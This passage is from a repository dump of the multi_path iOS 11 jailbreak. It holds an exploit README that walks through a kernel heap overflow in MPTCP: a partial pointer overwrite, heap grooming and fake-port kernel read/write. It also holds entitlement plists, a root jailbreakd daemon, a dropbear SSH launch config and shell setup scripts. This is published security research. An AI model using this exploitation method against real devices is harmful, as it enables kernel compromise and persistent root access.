 19 |   // verify sa_len for AF_INET6:
 20 | 
 21 |   if (dst->sa_family == AF_INET6 &&
 22 |       dst->sa_len != sizeof(mpte->__mpte_dst_v6)) {
 23 |     mptcplog((LOG_ERR, "%s IPv6 dst len %u\n", __func__, dst->sa_len), MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
 24 |     error = EINVAL;
 25 |     goto out;
 26 |   }
 27 | 
 28 |   // code doesn't bail if sa_family was neither AF_INET nor AF_INET6
 29 | 
 30 |   if (!(mpte->mpte_flags & MPTE_SVCTYPE_CHECKED)) {
 31 |     if (mptcp_entitlement_check(mp_so) < 0) {
 32 |       error = EPERM;
 33 |       goto out;
 34 |     }
 35 | 
 36 |     mpte->mpte_flags |= MPTE_SVCTYPE_CHECKED;
 37 |   }
 38 | 
 39 |   // memcpy with sa_len up to 255:
 40 | 
 41 |   if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) {
 42 |     memcpy(&mpte->mpte_dst, dst, dst->sa_len);
 43 |   }
 44 | 
 45 | //***************
 46 | 
 47 | Looking around in the structure which you overflow inside you notice you can hit both fields here:
 48 | 
 49 |   if (mpte->mpte_itfinfo_size > MPTE_ITFINFO_SIZE)
 50 |     _FREE(mpte->mpte_itfinfo, M_TEMP);
 51 | 
 52 | mpte_itfinfo_size is just before mpte_itfinfo.
 53 | 
 54 | When the structure is initialized the mpte_itfinfo pointer points to a small inline array. If more subflows are added
 55 | than will fit in there they are instead put in a heap buffer, and mpte_itfinfo will point to that.
 56 | 
 57 | If you had another bug (eg the kernel heap disclosure bug from async_wake) you could overwrite the mpte_itfinfo field
 58 | with any valid zone object and it would get free'd (in fact, you could also overwrite it with an offset into that object
 59 | for even more fun!)
 60 | 
 61 | However, we don't have that.
 62 | 
 63 | Instead another approach is to partially overwrite the pointer. If we partially overwrite it with NULL bytes we can point
 64 | it to a 256 byte, 65k, 16MB or 4GB aligned value.
 65 | 
 66 | In this exploit I choose a 3 byte NULL overwrite, which will cause a kfree of the mpte_itfinfo address rounded down to the
 67 | next 16MB boundary.
 68 | 
 69 | The exploitation flow is as follows:
 70 | 
 71 | Allocate alternatingly 16MB of ipc_kmsgs followed by a bunch of mptcp sockets. The goal here is to get a kalloc.2048 allocation
 72 | at that 16MB boundary.
 73 | 
 74 | Use the bug to free one of the ipc_kmsgs, moving that page to the intermediate list and putting the 16MB-aligned allocation on a
 75 | kalloc.2048 intermediate page freelist.
 76 | 
 77 | Allocate a bunch of filled 2047 byte pipes; the backing buffers for these pipes will come from kalloc.2048, hopefully including our
 78 | 16MB-aligned address.
 79 | 
 80 | Trigger the bug a second time, freeing the same address and this time then allocate a bunch of preallocated ipc_kmsg buffers from
 81 | kalloc.2048.
 82 | 
 83 | Now we hopefully have an ipc_kmsg (which we can get messages sent to and then receive) and a pipe buffer (which we can read and write)
 84 | overlapping each other.
 85 | 
 86 | I use the thread exception port trick from extra_recipe to get messages sent to the prealloced ipc_kmsg buffer. Each time we check each
 87 | of the pipes to see if any of them contain the message. When we find the right (ipc_kmsg,pipe) pair we can rewrite the message to send ourselves
 88 | a fake port which lives inside the pipe buffer. I structure that fake port like the one from async_wake (which I based on yalu 10.2 by
 89 | @qwertyoruiopz and @marcograss) to give me an early kernel read primitive.
 90 | 
 91 | Using the kernel read primitive I find the kernel task and make a fake port which allows easier kernel memory read/write via
 92 | mach_vm_read/mach_vm_write.
 93 | 
 94 | Caveat: To connect mptcp sockets you do need the com.apple.developer.networking.multipath entitlement which requires an apple developer cert, which
 95 | anyone can buy from Apple.
 96 | 
 97 | Reliability:
 98 | This is a security reseach tool and is faaaar from perfect. However, it should work most of the time, and when it does work it should
 99 | do a good job of cleaning up so it won't panic later.
100 | 
101 | To improve the probability of it working:
102 |   * turn off wifi and go in to airplane mode
103 |   * reboot
104 |   * wait 30 seconds after restarting
105 |   * run the app from xcode
106 | 
107 | Supported devices:
108 | It should work on iOS 11.0 - 11.3.1 inclusive. I have tested on: iPod Touch 6g, iPhone 6s, iPhone SE, iPhone 7, iPhone 8
109 | 
110 | API:
111 | #include "sploit.h" and call go() to run the exploit.
112 | If it worked you can use the functions in kmem.h to read and write kernel memory
113 | 
114 | Notes:
115 | Multiple people have publically bindiff'ed this bug from the patch (or their 0day got patched ;) read their stuff for more details:
116 |   @elvanderb gave a lightning talk about the bug at rump.beer in Paris on May 31st: https://www.rump.beer/2018/slides/ios_48h.pdf
117 |   @jaakerblom published a working exploit on github on June 1st: https://github.com/potmdehex/multipath_kfree
118 |      John's technique is similar to mine but he does a two-byte overflow rather than a three byte one, and replaces with different objects. good stuff!
119 | 


--------------------------------------------------------------------------------
/multi_path/ViewController.h:
--------------------------------------------------------------------------------
 1 | //
 2 | //  ViewController.h
 3 | //  multi_path
 4 | //
 5 | //  Created by Ian Beer on 5/28/18.
 6 | //  Copyright © 2018 Ian Beer. All rights reserved.
 7 | //
 8 | 
 9 | #import <UIKit/UIKit.h>
10 | 
11 | @interface ViewController : UIViewController
12 | 
13 | @property (weak, nonatomic) IBOutlet UITextView *logs;
14 | 
15 | @end
16 | 
17 | 


--------------------------------------------------------------------------------
/multi_path/amfid_payload.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/amfid_payload.dylib


--------------------------------------------------------------------------------
/multi_path/dylibs/amfid_payload.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/dylibs/amfid_payload.dylib


--------------------------------------------------------------------------------
/multi_path/dylibs/dummypass.dylib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/dylibs/dummypass.dylib


--------------------------------------------------------------------------------
/multi_path/inject_criticald/Ent.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>platform-application</key>
 6 | 	<true/>
 7 | 	<key>get-task-allow</key>
 8 | 	<true/>
 9 | 	<key>com.apple.system-task-ports</key>
10 | 	<true/>
11 | 	<key>task_for_pid-allow</key>
12 | 	<true/>
13 |     <key>com.apple.private.security.container-required</key>
14 |     <false/>
15 | </dict>
16 | </plist>
17 | 
18 | 


--------------------------------------------------------------------------------
/multi_path/inject_criticald/Makefile:
--------------------------------------------------------------------------------
 1 | TARGET  = inject_criticald
 2 | OUTDIR ?= bin
 3 | 
 4 | CC      = xcrun -sdk iphoneos cc -arch arm64
 5 | # it is injected into trust cache by code
 6 | # which only supports sha-256 signatures
 7 | LDID    = ldid2
 8 | CFLAGS  = -Wall -Iinclude
 9 | 
10 | .PHONY: all clean
11 | 
12 | DEBUG ?= 0
13 | ifeq ($(DEBUG), 1)
14 |     CFLAGS += -DINJECT_CRITICALD_DEBUG
15 | else
16 |     CFLAGS += -O2
17 | endif
18 | 
19 | all: $(OUTDIR)/$(TARGET)
20 | 
21 | $(OUTDIR):
22 | 	mkdir -p $(OUTDIR)
23 | 
24 | $(OUTDIR)/$(TARGET): *.m | $(OUTDIR)
25 | 	$(CC) -o $@ $^ -framework Foundation -framework IOKit $(CFLAGS) AppSupport.tbd
26 | 	$(LDID) -SEnt.plist $@
27 | 
28 | clean:
29 | 	rm -f $(OUTDIR)/$(TARGET)
30 | 


--------------------------------------------------------------------------------
/multi_path/inject_criticald/bin/inject_criticald:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/inject_criticald/bin/inject_criticald


--------------------------------------------------------------------------------
/multi_path/inject_criticald/include/AppSupport/CPBitmapStore.h:
--------------------------------------------------------------------------------
1 | @interface CPBitmapStore : NSObject
2 | 
3 | - (void)purge;
4 | 
5 | @end
6 | 


--------------------------------------------------------------------------------
/multi_path/inject_criticald/include/AppSupport/CPDistributedMessagingCenter.h:
--------------------------------------------------------------------------------
 1 | @interface CPDistributedMessagingCenter : NSObject
 2 | 
 3 | + (instancetype)centerNamed:(NSString *)name;
 4 | 
 5 | - (void)runServer;
 6 | - (void)runServerOnCurrentThread;
 7 | - (void)stopServer;
 8 | 
 9 | - (void)registerForMessageName:(NSString *)messageName target:(id)target selector:(SEL)selector;
10 | 
11 | - (BOOL)sendMessageName:(NSString *)messageName userInfo:(NSDictionary *)userInfo;
12 | 
13 | - (NSDictionary *)sendMessageAndReceiveReplyName:(NSString *)messageName userInfo:(NSDictionary *)userInfo;
14 | - (NSDictionary *)sendMessageAndReceiveReplyName:(NSString *)messageName userInfo:(NSDictionary *)userInfo error:(NSError **)error;
15 | 
16 | @end
17 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/LaunchDaemons/jailbreakd.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>Label</key>
 6 | 	<string>jailbreakd</string>
 7 | 	<key>Program</key>
 8 | 	<string>REPLACE_ME/bin/jailbreakd</string>
 9 | 	<key>EnvironmentVariables</key>
10 | 	<dict>
11 | 		<key>KernelBase</key>
12 | 		<string>0x746f6d6f68696d61</string>
13 | 	</dict>
14 | 	<key>UserName</key>
15 | 	<string>root</string>
16 | 	<key>RunAtLoad</key>
17 | 	<true/>
18 | 	<key>KeepAlive</key>
19 | 	<true/>
20 | 	<key>StandardErrorPath</key>
21 | 	<string>/var/log/jailbreakd-stderr.log</string>
22 | 	<key>StandardOutPath</key>
23 | 	<string>/var/log/jailbreakd-stdout.log</string>
24 | </dict>
25 | </plist>
26 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/LaunchDaemons/testbin.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>Label</key>
 6 | 	<string>testbinary</string>
 7 | 	<key>Program</key>
 8 | 	<string>REPLACE_ME/../test</string>
 9 | 	<key>ProgramArguments</key>
10 | 	<array>
11 | 		<string>REPLACE_ME/../test</string>
12 | 	</array>
13 | 	<key>RunAtLoad</key>
14 | 	<true/>
15 | 	<key>KeepAlive</key>
16 | 	<false/>
17 | 	<key>StandardOutPath</key>
18 | 	<string>/var/log/testbin.log</string>
19 | </dict>
20 | </plist>
21 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/amfidebilitate:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/amfidebilitate


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/bash:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/bash


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/cat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/cat


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/chmod:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/chmod


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/cp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/cp


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/date:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/date


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/dd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/dd


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/hostname:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/hostname


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/jailbreakd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/jailbreakd


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/jbclient:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/jbclient


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/kill:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/kill


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/launchctl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/launchctl


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/launchctl_:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/launchctl_


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/ln:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/ln


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/ls:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/ls


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/mkdir:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/mkdir


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/mv:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/mv


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/pwd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/pwd


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/rm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/rm


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/rmdir:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/rmdir


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/rootme:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/rootme


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/sh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/sh


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/sleep:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/sleep


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/stty:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/stty


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/sync:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/sync


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/bin/zsh:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/bin/zsh


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/default.ent:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 2 | <plist version="1.0">
 3 | <dict>
 4 |     <key>platform-application</key>
 5 |     <true/>
 6 |     <key>com.apple.private.security.container-required</key>
 7 |     <false/>
 8 | </dict>
 9 | </plist>
10 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/dropbear.plist:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 3 | <plist version="1.0">
 4 | <dict>
 5 | 	<key>Label</key>
 6 | 	<string>Dropbear</string>
 7 | 	<key>Program</key>
 8 | 	<string>REPLACE_ME/usr/local/bin/dropbear</string>
 9 | 	<key>ProgramArguments</key>
10 | 	<array>
11 | 		<string>REPLACE_ME/usr/local/bin/dropbear</string>
12 | 		<string>-R</string>
13 | 		<string>--shell</string>
14 | 		<string>REPLACE_ME/bin/bash</string>
15 | 		<string>-E</string>
16 | 		<string>-p</string>
17 | 		<string>22</string>
18 | 		<string>-p</string>
19 | 		<string>2222</string>
20 | 		<string>-p</string>
21 | 		<string>4242</string>
22 | 	</array>
23 | 	<key>RunAtLoad</key>
24 | 	<true/>
25 | 	<key>KeepAlive</key>
26 | 	<true/>
27 | 	<key>StandardOutPath</key>
28 | 	<string>/var/log/dropbear.log</string>
29 | 	<key>StandardErrorPath</key>
30 | 	<string>/var/log/dropbear_error.log</string>
31 | </dict>
32 | </plist>
33 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/alternatives/README:
--------------------------------------------------------------------------------
1 | Please read the update-alternatives(8) man page for information on this
2 | directory and its contents.
3 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/sources.list.d/saurik.list:
--------------------------------------------------------------------------------
1 | # DO NOT EDIT | This is the story of a time long ago, A time of myth and legend, when the Earth was still young.
2 | # The ancient gods were petty and cruel, and they plagued mankind with suffering and beseiged them with terrors. 
3 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/bigboss.gpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/bigboss.gpg


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/modmyi.gpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/modmyi.gpg


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/saurik.gpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/saurik.gpg


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/zodttd.gpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/etc/apt/trusted.gpg.d/zodttd.gpg


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/motd:
--------------------------------------------------------------------------------
1 | cEnjoy SSH! ~@Jakeashacks
2 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/profile:
--------------------------------------------------------------------------------
1 | export PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/bin/X11:/usr/games:REPLACE_ME/usr/local/sbin:REPLACE_ME/usr/local/bin:REPLACE_ME/usr/sbin:REPLACE_ME/usr/bin:REPLACE_ME/sbin:REPLACE_ME/bin'
2 | export PS1='\h:\w \u\$ '
3 | REPLACE_ME/bin/bash
4 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/etc/zshrc:
--------------------------------------------------------------------------------
  1 | #
  2 | # /etc/zshrc is sourced in interactive shells.  It
  3 | # should contain commands to set up aliases, functions,
  4 | # options, key bindings, etc.
  5 | #
  6 | 
  7 | watch=(all)
  8 | 
  9 | export PATH=$PATH:/jb/usr/bin:/jb/bin:/jb/bin:/jb/sbin:/jb/usr/sbin:/usr/local/bin
 10 | 
 11 | 
 12 | if [ -f ~/2.DO ]; then
 13 |    cat ~/2.DO
 14 | fi
 15 | if [ `id -gn` = `id -un` -a `id -u` -gt 14 ]; then
 16 |         umask 002
 17 | else
 18 |         umask 022
 19 | fi
 20 | 
 21 | # Set up aliases
 22 | alias mv='nocorrect mv'       # no spelling correction on mv
 23 | alias cp='nocorrect cp'       # no spelling correction on cp
 24 | alias df='df -h'	      # More human readable
 25 | alias mkdir='nocorrect mkdir' # no spelling correction on mkdir
 26 | alias more='less'
 27 | alias ~='cd ~'
 28 | alias grep='grep --color=auto' # Colors on Grep
 29 | 
 30 | 
 31 | # Shell functions
 32 | setenv() { export $1=$2 }  # csh compatibility
 33 | # Johnny's opts...
 34 | setopt correct
 35 | setopt correct_all
 36 | setopt nohup
 37 | #set correct=cmd
 38 | 
 39 | # Some environment variables
 40 | path=($path $HOME/bin)
 41 | export USER=`id -un`
 42 | export LOGNAME=$USER
 43 | export HOSTNAME=`uname -n`
 44 | export MAIL=/var/spool/mail/$USER
 45 | 
 46 | 
 47 | 
 48 | # Set prompts
 49 | #PROMPT=%b%S"$USER@%m %{%}(%~) %#%s%B" 	   # default prompt
 50 | #RPROMPT="%B%T%b"     # prompt for right side of screen
 51 | #SPROMPT='You meant %r, Right? '
 52 | 
 53 | 
 54 | #
 55 | 
 56 | RPROMPT="%B%{%}%T%{%}%b"
 57 | PROMPT=%b%S"$USER@%m %{%}(%~) %#%s%B" 	   # default prompt
 58 | 
 59 | #
 60 | # below works, but if no zsh files are in /etc/profile.d it complains
 61 | # everytime zsh is run. Commenting out for now.
 62 | #
 63 | # run other components
 64 | #for i in /etc/profile.d/*.zsh
 65 | #do
 66 | #  source $i
 67 | #done
 68 | 
 69 | # bindkey -v             # vi key bindings
 70 | bindkey -e               # emacs key bindings
 71 | bindkey ' ' magic-space  # also do history expansino on space
 72 | 
 73 | #------------------------------------------------------------------------
 74 | # Define LINUX Color Styles Here!
 75 | #------------------------------------------------------------------------
 76 | 
 77 | LS_COLORS="no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:\
 78 | cd=40;33;01:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:\
 79 | *.bat=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:\
 80 | *.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.jpg=01;35:*.gif=01;35:\
 81 | *.bmp=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.README=05;1:*.DO=05;1:*.avi=00;32:*.mp3=00;33:"
 82 | export LS_COLORS
 83 | 
 84 | LS_OPTIONS="--color=tty -F -T 0"
 85 | export LS_OPTIONS
 86 | export CLICOLOR=1
 87 | alias d=dir
 88 | alias v=vdir
 89 | alias vi=vim
 90 | 
 91 | PROMPT_COMMAND='echo -ne "\033]0;${USER}@${HOSTNAME}: ${PWD}\007"'
 92 | 
 93 | export MANPATH=/usr/share/man:/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk/usr/share/man
 94 | 
 95 | export LESS_TERMCAP_mb=$'\E[01;31m'
 96 | export LESS_TERMCAP_md=$'\E[01;31m'
 97 | export LESS_TERMCAP_me=$'\E[0m'
 98 | export LESS_TERMCAP_se=$'\E[0m'
 99 | export LESS_TERMCAP_so=$'\E[01;44;33m'
100 | export LESS_TERMCAP_ue=$'\E[0m'
101 | export LESS_TERMCAP_us=$'\E[01;32m'
102 | export LESS=-r
103 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/makeMeAtHome.sh:
--------------------------------------------------------------------------------
 1 | #
 2 | # Sets up J's favorite environment
 3 | #
 4 | # These are perfectly safe and reversible
 5 | #
 6 | 
 7 | export PATH=/jb/usr/bin:/jb/bin:/jb/sbin:/jb/usr/sbin:/jb/usr/local/bin:
 8 | 
 9 | 
10 | echo Enabling SCP
11 | mv /jb/usr/bin/scp /usr/bin/scp
12 | 
13 | echo Setting up ZSH Support files
14 | mkdir -p /usr/local/lib/zsh/5.0.8/zsh
15 | mv /jb/usr/local/lib/zsh/5.0.8/zsh/* /usr/local/lib/zsh/5.0.8/zsh 
16 | mv /jb/bin/zsh /bin
17 | mv /jb/etc/zshrc /etc
18 | 
19 | echo Setting up Terminfo Database
20 | mkdir -p /usr/share/terminfo
21 | mv /jb/usr/share/terminfo/* /usr/share/terminfo/
22 | 
23 | echo Moving J-tools to /usr/local/bin
24 | mkdir -p /usr/local/bin
25 | mv /jb/usr/local/bin/* /usr/local/bin
26 | 
27 | 
28 | echo It\'s fine if you saw errors that some directories were not empty.
29 | echo now feel free to run \'zsh\' instead of bash
30 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/profile:
--------------------------------------------------------------------------------
1 | export PS1='$USER@$HOST ($PWD)# '
2 | 
3 | export PATH=/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
4 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/removeMe.sh:
--------------------------------------------------------------------------------
 1 | echo Removing Message-of-the-Day
 2 | /jb/bin/rm /etc/motd
 3 | echo Removing /.cydia_no_stash
 4 | /jb/bin/rm /.cydia_no_stash 
 5 | echo Removing Cydia
 6 | /jb/bin/rm -fR /Applications/Cydia.app/
 7 | echo Removing terminfo database
 8 | /jb/bin/rm -fR /usr/share/terminfo
 9 | echo Removing ZSH support files
10 | /jb/bin/rm -fR /usr/local/lib/zsh
11 | /jb/bin/rm /bin/zsh
12 | /jb/bin/rm /etc/zshrc
13 | 
14 | echo Removing J-tools from /usr/local/bin
15 | /jb/bin/rm -fR /usr/local/bin
16 | 
17 | echo Removing /usr/bin/scp as well. This means you can\'t use WinSCP, etc anymore.
18 | /jb/bin/rm /usr/bin/scp
19 | 
20 | echo Reenabling mesu.apple.com \(for auto-updates and/or stock app downloads\)
21 | /jb/bin/cat /etc/hosts | /jb/bin/grep -v mesu > /tmp/hosts.tmp
22 | /jb/bin/mv /tmp/hosts.tmp /etc/hosts
23 | 
24 | echo Removing /jb
25 | /jb/bin/rm -fR /jb
26 | 
27 | echo Sad to see you go.. but - That\'s it - no traces should be left. 
28 | echo You cannot do anything else in the shell since the binaries have all been removed. 
29 | echo Reboot your device to stop dropbear. 
30 | 


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/dmesg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/dmesg


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/ifconfig:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/ifconfig


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/kextunload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/kextunload


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/md5:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/md5


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/mknod:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jakeajames/multi_path/b8ff6c07d6c2177c68067cb423f62eb3f1c2a213/multi_path/iosbinpack64/sbin/mknod


--------------------------------------------------------------------------------
/multi_path/iosbinpack64/sbin/ping:
